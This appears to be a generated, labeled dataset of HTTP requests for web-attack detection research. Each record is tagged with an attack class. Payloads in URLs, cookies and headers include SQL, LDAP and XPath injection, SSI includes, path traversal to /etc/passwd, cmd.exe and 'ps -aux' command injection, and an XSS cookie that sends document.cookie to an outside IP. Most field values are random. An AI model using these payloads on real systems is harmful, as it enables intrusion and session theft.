X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

erewp6m1joeh=<!-- #exec     cgi="/cgi-bin/script?ihd"    -->

End - Id: 39192
Start - Id: 39073
class: LdapInjection
PUT /tr3keW4feG763JokeSKj/eazDlaec2yExgs3/suI/oYUDrrA.0aDizbiEDz.jpeg? HTTP/1.1
Content-Length: 27
Content-Language: et7cdrcp,rde3xFe,guTeeyo
Content-Encoding: compress
Content-Location: http://www.sXvnaeoo.st/oi7nap/iritgei.tiff
Content-MD5: aGl0ZmM4emV1YW52YmFuMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Jul 09 10:50:46 UTC
Last-Modified: Fri, 13 Apr 07 23:22:39 GMT
Host: www.6slaoied.cz:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 177.22.162.17
Cookie: eii=melqset;aclminh5kfct=iElto;rv=)    (  |  (displayName=had*)(name =    had*   )(    mail=had*  );b28H=beti$rate/Bustyleepassthru
Cookie2: $Version="04"
Date: Mon, 25 Dec 06 22:22:54 UTC
ETag: W/"yvzX9iqgrv6V52Mvwhh"
Expect: At1t
From: tr6Rzr@s2NsE.cz
If-Modified-Since: Tue, 08 Sep 09 19:41:56 UTC
If-Unmodified-Since: Wed, 27 May 09 12:07:03 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Feb 04 05:09:49 CET
Max-Forwards: 44
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM dGVhZHRlT2luaWVoZXdUb2VoaWVFSWlkZXNpWGkyaDNn
Range: -798,89211-,080300-12
Referer: http://www.uTod.st/e0hcat/Ts3tubH0/ihdtld5/eI7nbrq.php3
TE: deflate
Trailer: If-Match
User-Agent: c1deV/9.2.4.0.1
UA-CPU: 68000
UA-Disp: 5522,0953,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 427x4997
Via: DuiLns/6.4 164.25.133.152, eiir/0.0 59.143.131.36:538, FTP/2.3 208.214.52.185
Transfer-Encoding: gzip
Upgrade: Icn0ei/9.6, oNoee3/0.6
Warning: 577 138.2.104.195 "uIre1eno" "Thu, 18 Mar 04 10:51:09 GMT"
X-Forwarded-For: 35.165.196.147
X-Serial-Number: 53018392304378
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

alntSHYoyEtip9=kQAtqv265S_p

End - Id: 39073
Start - Id: 40709
class: SSI
POST /gi8TnIT6Jb6jOkbIqz/onuccigTshlpAbarg/Plhliteaain.sh? HTTP/1.0
Content-Length: 273
Content-Language: t
Content-Encoding: gzip
Content-Location: http://www.jttmia8.org/Dz9aSts/E8htO/eedtuOo.pdf
Content-MD5: ZGVuZjNrZXRoTXFpaXV0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Feb 10 24:16:18 GMT
Last-Modified: Thu, 05 Jan 06 08:41:41 UTC
Host: 165.11.141.48
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.9
Accept-Encoding: gzip, identity;q=0.5, deflate;q=0.9
Accept-Language: noshstne-4
Cache-Control: no-cache
Client-ip: 105.32.24.107
Cookie: uIEsztr=r36Ujja;1Qzq=<!-- #include virtual="d:\windows\autoexec.bat" -->;Suocbeeeftihq=66294;narvAedsStta=mthde~0anhsTelja
Cookie2: $Version="750"
Date: Sat, 28 Jan 06 08:20:53 UTC
ETag: "Rkqfhme_w8wVMuP"
Expect: zHxlssem
From: p3eooHt@0Ticicyoi.cz
If-Modified-Since: Tue, 28 Jul 09 16:32:12 GMT
If-Unmodified-Since: Fri, 11 Dec 09 10:47:30 UTC
If-Match: "V8ag9LpWL50KhUB"
If-None-Match: *
If-Range: Thu, 21 Jun 07 10:45:42 UTC
Max-Forwards: 7
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest response="bCAbF45F0dB15ce3eCF56Af61F4e536F"
Range: 6-8,-50918,9527-
Referer: /utep0do/81gsei/uteg/eh5arrw/betuN.tar.gz
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/5.7 (X11; U; Open BSD i386 6.1; p7-wl; rv:6.6.2) Gecko/43832851
UA-CPU: 68000
Via: HTTP/9.6 154.50.20.86, 8.6 91.106.31.232
Transfer-Encoding: deflate
Upgrade: chpn/8.9, sie/3.3, aze/7.0, uxen/0.7
Warning: 718 www.Bosx4ea.png "oyhuehdpitot" "Sun, 30 Apr 06 04:30:12 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

idAssnjHh=ltdlwteuehrrnvoo&ttselttla=3244361&nah=624&yFyliraEhaim=85&trdteaag83tYat=srrafiEddtrAe&19tl=100619511&2asat=ebarpnaRr&Idt1wA3i6t1=49&sro=87472330&vhtaccesMDVYNreplace.=asktetusa36oli&MkFBJ=|v ot&uKEXiinsertalle=38502250&saimebwpyliq=eeK.&Temsao=0opkelmae4dYlnn

End - Id: 40709
Start - Id: 48763
class: XPathInjection
GET /81gNfBGfy2CpBoP91LJ/exXoh/E1KTLdEqG/deleteX2G/of_nnG/eIsE/iXSFq5YfUgwYxwqiwY_H/lPok2LQx/oSo/d.mmq.css?fTdnoAs=hhzt&xhx7ET=EfcnslfE0k&uyb=77&2pgR5elowcs=S%40%25+&4d3ebtwttper=oxn.s_jckc5&ym9gnEsfX=iessotezmenredtr&8pm9kbuze=y6tehh%27+++++or+1%3C+++rtfc%2F3eE%2Fmhh%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D72%5D++or++++%27imtrf%27+++%3D++++%27 HTTP/1.1
Host: 249.71.222.139
Connection: close
Accept: application/*;q=0.4, video/mpeg;q=0.3
Accept-Charset: koi8;q=0.3, x-mac-cyrillic
Accept-Encoding: identity;q=0.5, gzip;q=0.2, compress;q=0.6
Accept-Language: ph5-ka2tw, e7sng-oewrm, jyeafru-epqhc
Cache-Control: no-store
Client-ip: 103.145.186.132
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Wed, 29 Apr 09 06:44:10 GMT
ETag: W/"I@hAWbaTz@D0WI_DL5"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Thu, 16 Apr 09 24:46:48 UTC
If-Unmodified-Since: Fri, 02 Jul 04 17:23:40 UTC
If-Match: *
If-None-Match: "Xw_SS_rfttntfSCuV"
If-Range: Wed, 03 Nov 04 10:36:40 GMT
Max-Forwards: 8
MIME-Version: 1.8
Pragma: eaar=e
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: NTLM NnQzZW5zZXJTcmVibWFldGxlb2VPaUFsb25kaDFyYjR1eQ==
Range: 11-
Referer: http://eYut.gov/aroIenlS.sh
TE: deflate;q=0.1,trailers,gzip;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.0 (compatible; gputuyaer; Win 9x; 93Dsde3t; arcni)
UA-CPU: MIPS
UA-Disp: 924,263,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0640x829
Via: 3.9 www.edesotms.tiff:1, 3.4 201.178.12.215:8619, nntpp/4.8 www.ltTci.jpg
Transfer-Encoding: identity
Upgrade: npelr/9.1, ir3/9.6, trmYd/3.9, egD/1.4, hafn8/5.0
Warning: 479 211.56.14.116 "qeorie44toHnoseg46" 
X-Forwarded-For: 63.198.80.135
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48763
Start - Id: 49336
class: XPathInjection
GET /ocC1Z7JGaiZmykh/iQ0./ejnUErvtvohnu9ec/K9/doc7a3mfbanhasnnn.mdb?oi2=antde5tyL%22h+%22oG&srnhfnE=llnrbehEgT2&5hY20uihlTeoofc=Swgei&errt=30875446&keunseizSaemh=05&pnwon5zolETmn=wuRgehcoly&neos3wiadegtgS=%3An%3EiIlogunion%26xaem&k2SdEpM18-Nh=749++++or+++++1%3C+++++src3%2Fy%2Ftw%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D460%5D++or+65%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: www.4saT3.it
Connection: keep-alive
Accept: image/*;q=0.5, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip;q=0.1
Accept-Language: fliohn-7oa0Lr7;q=0.5, hsao-Pieo;q=0.2
Cache-Control: only-if-cached
Client-ip: 23.148.126.23
Cookie: 3jrr=netcatNanp=m9o;annPheeOgrtaS=0;I2motmed0whxe=2978958476;RAnDz=ro;4gQt=iEdrhc;v8tL_9hPTOb0=wotaO
Cookie2: $Version="889"
Date: Sun, 14 Feb 10 14:42:35 CET
ETag: W/"FV.LajZ9oyTbHsHCIym"
Expect: nlurIti
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Sun, 10 Jul 05 04:00:03 UTC
If-Match: "F_UbHJV_DEwBike_"
If-None-Match: "2sXxYV.Ic6rbmYH_"
If-Range: Sat, 29 Aug 09 15:43:43 CET
Max-Forwards: 48
MIME-Version: 6.3
Pragma: aeo9ae8=apectph
Proxy-Authorization: NTLM dGVlbW9wNWVvd21temR0cmFOaG5lSVNUbGx0bU9tb2hlbA==
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: http://ihlinx6n.uk/bed3r3/ok2heetg/utoTm.msf
TE: trailers,gzip;q=0.9,trailers
Trailer: From
User-Agent: Mozilla/5.4 (X11; U; Open BSD i386 9.1; gn-fe; rv:9.5.3) Gecko/60508426
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 953x2070
Via: HTTP/2.2 www.beewh.jpeg:6574, HTTP/1.3 www.so3uh.jpeg
Transfer-Encoding: identity
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49336
Start - Id: 42639
class: SqlInjection
GET /Ese7ta/pnisasw/ntniay/PT4uaDk/aMAtthnahiym/to/ggnh/oLh4@zk.8_6RwBl/aslqjb5evItrh/rpsLyf/afWeAetorwesitbthnai.bin?AO3k3rK=45&nmwi0=%3B+++EXEC%28+%27INS%27%2B%27ERT+INTO+++++users+++++values%2844%2C%279i%27%2C%27ofia2neo7%27+++%29%29&Cb4netcat49Sq-=uot+O4auua HTTP/1.0
Host: 248.133.255.244
Connection: close
Accept: */*
Accept-Charset: x-mac-ce;q=0.8, windows-1251;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 67.157.110.65
Cookie: Nchheoa=zessin;7CZPdeleteF=6e7os;JKBR=siMtk
Cookie2: $Version="26"
Date: Sun, 29 Jun 08 21:19:49 CET
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Wed, 28 Sep 05 05:41:55 UTC
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "0zFDEijPWHLZhYFf"
If-None-Match: "t3ZZn9T7aZU5gRt"
If-Range: Sat, 08 Oct 05 19:36:02 CET
Max-Forwards: 683
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM OTFveGhqbGFlMHRvb2FkaXJPY3NxOG1zdGFmM3Rzam5SdmU=
Range: 72326-9838
Referer: http://www.nteif9pR.it/difRuerq.asp
TE: trailers
Trailer: Warning
User-Agent: ehejau (iMXLfT; sPO4OBcqq@)
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4720x346
Via: eamee0/8.5 www.9ueme.html, HTTP/2.0 220.229.183.76, 1.0 www.j4egtp.png
Transfer-Encoding: msQMex; tn1crhi=dpkR
Upgrade: tao/2.6, ola/2.8, lt3/7.5
Warning: 162 www.tgbma.css:1 "eWemetp9erNow3n" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42639
Start - Id: 47048
class: XSS
GET /cp1fABz1Srdl-TAlh-fe/l4aafk7ozcnllcC/Wu1urmC2e-Y5_DN.jsp?tegaonMzz=%24oq3M%7Eu+ztelnetra%7Cdy&5qo8qAgetngNtaN=%3Cimg%2Bsrc%3Djavascript%3A+alert++%28%27ai4.t%27%29++%3E&nc=mbQz7&NbKh=19&ceandtt=84400&at2anluoI=sko3tg2aec&seelngsAwdu4aot=sock_stream%3Cxntelnet%25%26eemochan&9cGnwhotlglIct=831959&izat=ht%27it&ih=25199889&dlhoarpftif=851881 HTTP/1.1
Host: www.ecichesb.gov
Connection: smiuuss
Accept: */*;q=0.9
Accept-Charset: cp-950, x-mac-korean, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=55694
Client-ip: 67.25.41.239
Cookie: eea2uono=3458358;dLVent=isil tjdbrh0esnieg ];TichT=5;ui7=eqe;xAesafGuhpahc=nss?s0object;8e=o7
Cookie2: $Version="33"
Date: Thu, 31 Jan 08 10:26:31 CET
ETag: "xAjLDL6y7lpFf1FZDT"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Sat, 16 Jan 10 13:50:59 UTC
If-Unmodified-Since: Wed, 18 Oct 06 05:43:36 UTC
If-Match: "hr925sZF2fbN0riJ"
If-None-Match: *
If-Range: Thu, 03 May 07 10:58:14 GMT
Max-Forwards: 5112
MIME-Version: 1.7
Pragma: emedlm='o5mawtn'
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: Digest response="8745DFa2b418762cEBbecDFf1fC62878"
Range: 388869-790680,430-,-04157
Referer: http://www.epmdc.cz/cerfw.mp3
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 2.4; oo-ne; rv:5.0.7) Gecko/78650508
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 987x1282
Via: 3.1 130.185.200.45, 8.4 www.y1ssws.htm, 4.9 107.177.178.240
Transfer-Encoding: deflate
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 325 www.hiofaai.jpg "t4eneszdrtoed" "Mon, 26 Jul 04 01:19:48 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47048
Start - Id: 36673
class: OsCommanding
GET /7b2Cqic9Cb-7@BXj/xmp1wsccnlfn/tmFRFOzT3R_Po/yBK4q/nVC3lGvwAzz/ehicsat/Ra1bcweren/i6seEeikcatrEyusi/ie/lE0eQvFYfE6zK2cc@N5g/tj/n.7sSjW9HL994.bin?aR=nqT&VmenaeesyTtl=ar%5D++&ul5=qformalltwhere&st=hXvO&fnqsvahanle=sSdB2WNl&k.Aq=uoheekett1punp5rs&uXr2=lmihErUfr&Ie=meta&wlnmalyoqut=gq&LzcO=2329359&zrtb5oon=ieaEw72ey5Ef8hee&dxthf=rsgG60Yx%40&n7etceU=sk0bKZoz HTTP/1.1
Host: www.ziH8wlf.uk
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: iso-8859-6;q=0.3, x-mac-japanese, iso-8859-9;q=0.7, x-mac-korean, utf-8
Accept-Encoding: identity;q=0.4, gzip, compress;q=0.0, identity, deflate
Accept-Language: 4op-dsrlErl;q=0.7, hteatwr-lchd
Cache-Control: no-transform
Client-ip: 14.224.231.96
Cookie: iy2tat=7;tSt7gnpaci9tns=zDYgK3Bs9;boot.iniSetclochildt-9=9T8kbes9;dLpU8soU=)o9nn
Cookie2: $Version="2"
Date: Wed, 01 Jul 09 17:25:40 CET
From: iird5s2@iarDlAnto.net
If-Modified-Since: Wed, 20 Jul 05 10:19:52 GMT
If-Unmodified-Since: Tue, 04 Jul 06 06:48:36 GMT
If-Match: "9@pX57CchNp9si1QCv0"
If-None-Match: *
Max-Forwards: 9
MIME-Version: 5.4
Pragma: ssah6=onewgsm
Range: 50-4,41661-
Referer: http://3aqwtcs.be/strir/qolee.exe
TE: trailers,deflate;q=0.8,chunked;q=0.9
User-Agent: '     ;  ps  -aux  ;
UA-OS: FreeBSD
UA-Pixels: 211x4085
Via: 3.2 www.iueo.jpeg:7, sjtdii/1.8 www.mey5ekob.htm
Transfer-Encoding: deflate
Upgrade: k21de0/3.9, tcu/7.2, 6go/7.9, sirla/2.0, elb/6.0
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36673
Start - Id: 48488
class: XPathInjection
GET /tgrwutre3h/19RgFfL6pbce/taekrtsoipnmtken88ng/FcopyLJ5hajWKK5exec/rrs2yrnteebFsieOn/buIngannhwhhhi/yDewo5hk7rosha/aPHD9Mg0X4Sv/hMmr/sLiBTswTd.php3?03d3u=StaseU&ofrtee4sjeid=5tkI4&bysbhEgptMaa=eeoir&Irherr1taoAnai=n5eeitst0fxihlm&inuItemyi=fh&xedtaior=es5tsf3TEs&nesqOet=OnngXthufnnos&teRi=siGc+2s+a9ba HTTP/1.1
Host: www.hafhan.cz
Connection: tBudl
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: Osskh-ifEHdei;q=0.0, eorle-et;q=0.6, iluut-is;q=0.5, mojzmmn-na
Cache-Control: only-if-cached
Client-ip: 209.69.144.246
Cookie: @.ai@1=Ta6rsosvoceaEyr11d;ezf3ReaaZ3dmsc=uresAEv<yDz=Re;ootatdoeoyhu9l=7;9fsngLTd=sbfZL;izrmebd5i3ee=s5NfUlmZE;qMlkG=cnfdi'     or   z/a/child::node()[processing-instruction()=618]    or    'pbl' =    '
Cookie2: $Version="258"
Date: Sun, 17 Aug 08 06:00:58 GMT
ETag: "GY4NJ0V-NhU0q3V"
Expect: 100-continue
If-Modified-Since: Sun, 21 Jun 09 07:32:10 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Dec 07 24:16:47 CET
Max-Forwards: 419
Pragma: fa=o
Authorization: NTLM bm5ZYU1ldTFuclNub2x0VWlwbzhLbnVxdW5wbGFpdGd4cXRLb3RMZWZEZGlhdw==
Range: 0-977,-38694
Referer: /sgotfts/es1eco.msf
TE: deflate,gzip;q=0.6,trailers
Trailer: Host
User-Agent: hnd4N3snnitooiwcvm
UA-Color: color16
Via: 5.8 www.osli2.css, 8.7 166.222.0.51, FTP/6.6 www.drte3at.html:5959
Transfer-Encoding: compress
Upgrade: azokf/9.7
X-Serial-Number: 5936575
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48488
Start - Id: 37820
class: LdapInjection
GET /sLbCqsRal57DbID59kG/kWL86passthruFbgsoundeZIHVpD/kG_l/shsS3/pAer.cgi?Zeesljer=iunig%29%28%7C++++%28gnOd%3D*%29&ec=eN8zUZeNvfK HTTP/1.1
Host: www.e0la.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 68.129.230.145
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="1"
Date: Thu, 21 Sep 06 24:37:21 UTC
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: oltCtuc@anfmtcot1m.gov
If-Modified-Since: Wed, 27 May 09 06:51:16 CET
If-Unmodified-Since: Sat, 23 Jun 07 20:03:24 GMT
If-Match: *
If-None-Match: "y61iNKusWICoXiV"
If-Range: "hT0..GSfvGJaO_91M0"
Max-Forwards: 8
MIME-Version: 0.8
Pragma: McTS='3iM'
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Basic N2FkYmlyczp5bHFyb2VJ
Range: 094778-515740,335144-
Referer: http://www.r2nemtpe.st/nsda/bmrdltie/Mrpc/Lcyoi.cgi
TE: deflate;q=0.2,chunked
Trailer: TE
User-Agent: lhnhrnRurbfhCo
UA-CPU: x86
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: FTP/7.9 www.is7rir.html, HTTP/6.1 www.lhEmO.htm, 5.3 223.147.25.151
Transfer-Encoding: deflate
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37820
Start - Id: 36241
class: PathTransversal
GET /eZj7r.2s4A43/usauttntAeennyt7yant/mKyQGeScSh8g/drTnpkVQ2EqS2/3whasha/gEuErst/99InoNHiA7UrnXf/sLUM./bWAmc5fOj.png? HTTP/1.0
Host: www.eidiau.be:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: euc-tw;q=0.7, iso-8859-8-i;q=0.9
Accept-Encoding: gzip;q=0.5
Accept-Language: ios-0a;q=0.7
Cache-Control: only-if-cached
Client-ip: 176.222.240.213
Cookie2: $Version="575"
Date: Thu, 21 Aug 08 22:03:23 GMT
From: en0d@lIae9iet.com
If-Modified-Since: Mon, 23 Jul 07 10:22:19 UTC
If-Unmodified-Since: Mon, 22 Feb 10 05:49:14 GMT
If-Range: "60eAIGGcAJUey0k.IDAt"
Max-Forwards: 697
MIME-Version: 7.9
Proxy-Authorization: oipHw iniaen=th4tr
Authorization: Basic UEttTWlnYjpuZ0VudFNoMA==
Referer: http://sfidrtr.gov/meotsom/s1oozsrg.asp
User-Agent: ../../../../../../../../../etc/passwd
UA-Disp: 0066,1438,16
Transfer-Encoding: identity
Warning: 524 131.251.57.151:92246 "istvsstggkpeeehalc2Z" 

null

End - Id: 36241
Start - Id: 43756
class: OsCommanding
GET .%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 105.44.63.62:80
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oipe-q;q=0.9, fonfu-3armb;q=0.8, selfiAlr-yraceor
Cache-Control: max-stale=5
Client-ip: 251.209.185.79
Cookie: peDthio=17lnd;tLi5okfRnqntfyf=stamincludecneroiBR;apUaLf=e6angsobdtstaag4;oinar=tpbBqpvUalc;herr5TYosikd=eop2
Cookie2: $Version="1"
Date: Thu, 06 Mar 08 21:01:15 CET
ETag: W/"eswt@0WOjNcHm0ay1zzd"
Expect: fe8gaSr=na4I2h
From: Reoco@amlrswscus.de
If-Modified-Since: Sun, 10 Oct 04 02:21:56 CET
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: "0NigajImu8Ob2wpP"
If-Range: *
Max-Forwards: 1414
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rPoaihzn"
Authorization: Digest opaque="acadbN"
Range: 210020-381691,-20380,4976-
Referer: /73snrsf/t9xygrzh.txt
TE: deflate,deflate,chunked;q=0.8
Trailer: If-Unmodified-Since
User-Agent: ez-860i http://www.wder48be.gov
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1687x0114
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: compress
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 442223002
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43756
Start - Id: 46731
class: XSS
GET /8ulii8UHDd/nxsPhk8aJ5j/a@B8tgHlSLoiVTm3/iliBxNTlqM/cMmRvS1B2YHmKxxu/hnTuNJLsHJc2T.php4?ee=5795&u4orasHd=e&teedy4enRsrajn=rcb3n7ohsytOfluw&di9sfeoeco=985555&hibc=22&mi2alee=6&.rxRf@AoHsam_=ao4gobemtcebaei&bteeteefdeoeni=814373&Eei7sGuwpreao=lmFcuuSb&no=uizesa0erT-Ie HTTP/1.1
Host: 120.122.55.120
Connection: keep-alive
Accept: text/*;q=0.1, text/html;q=0.8, application/x-tar;q=0.0
Accept-Charset: iso-10646-ucs-2;q=0.2, windows-1258;q=0.4, iso-8859-9;q=0.6, iso-2022-jp, iso-8859-8;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 201.132.62.40
Cookie: iht=&<script>[window.open('http://199.142.193.250/inrele.aspx'+document.cookie);]</script    >;ne=74506233;1iAo3elknia4=sIaT;eY9aa4asnucfhdw=l1o(cwrR1;smedhrEa=mkojtRs_
Cookie2: $Version="8"
Date: Sat, 13 Aug 05 05:56:22 UTC
ETag: W/"6iD2Nmxi5v5ABb1tw"
Expect: 100-continue
From: Bnp1da@sliesdid.be
If-Modified-Since: Tue, 09 Jun 09 06:37:22 GMT
If-Unmodified-Since: Wed, 26 Aug 09 23:36:31 UTC
If-Match: *
If-None-Match: "Opry@I7.-3UISGO3vYox"
If-Range: "AywEmJhiDL8QpzEXJS"
Max-Forwards: 14
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: dNtwcd 6dptZm=tetko
Authorization: ojp6r uswliesi=uezLxoo
Range: -01,1051-
Referer: /Hebfs/amateq/iocet/geewcbe/1uio.php3
TE: trailers,trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/8.2 (Machintosh; U; Mac OS X 6.6; 5c-t8; rv:1.2.3) Gecko/66504590
UA-OS: Win98
UA-Color: color32
UA-Pixels: 318x240
Via: 7.6 www.xrQyh1t.htm, FTP/6.3 201.120.87.115, 6.1 www.rT2tn.jpeg
Transfer-Encoding: gzip
Upgrade: iMc/5.2, eehrbu/8.7, eliete/0.1
X-Serial-Number: 293931197401381
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46731
Start - Id: 36071
class: PathTransversal
GET /ciilh3lut/wget-wp-LWbuYeLG/yk5iscedohldwkoroL/Itvooeqlnoaeoh/eqWCpWybjtI/nTb/o@4YTOkCeI/u2R6aCPMeUZ/gDH8zVUKQwH/ncz63kkJCKqu6-WH5qQk/ockm0oisstgeEthuasne.aspx?teihmza=2&rSiecd=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.0
Host: 71.60.176.145
Connection: close
Accept: image/gif
Accept-Charset: euc-kr;q=0.5, windows-874, shift_jis;q=0.2, euc-jp
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 200.128.28.203
Cookie: libbot=auSosieEtsncese;oamore= oireM5e0lee
Cookie2: $Version="080"
Date: Thu, 21 Dec 06 09:13:33 UTC
ETag: W/"CHRBHIdtJ0gNNdG"
Expect: taRsras
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 14 Oct 08 23:18:10 GMT
If-Unmodified-Since: Mon, 03 Apr 06 18:00:51 CET
If-Match: *
If-None-Match: "SEoJqpB@sJL79pzysCs"
If-Range: Sun, 13 Jul 08 11:34:28 GMT
Max-Forwards: 3
MIME-Version: 8.7
Pragma: iyme=ndivsd
Proxy-Authorization: Basic ZXd3b2Y6aHh0YQ==
Authorization: Basic Y3J0TmlhOmltbGxvYQ==
Range: -31,-3,49859-
Referer: /6refr.tar.gz
TE: deflate
Trailer: Warning
User-Agent: Mozilla/0.4 (compatible; Konqueror/8.3; Open BSD i386; 3ald6; 1rdplwrw7r)
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 745x4826
Via: FTP/9.6 164.60.22.111:0, HTTP/8.3 150.2.224.144, 7.8 www.naxNc.htm:8073
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 470 84.239.232.183 "ogeeensejl" "Mon, 03 Jan 05 03:00:35 CET"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36071
Start - Id: 49121
class: XPathInjection
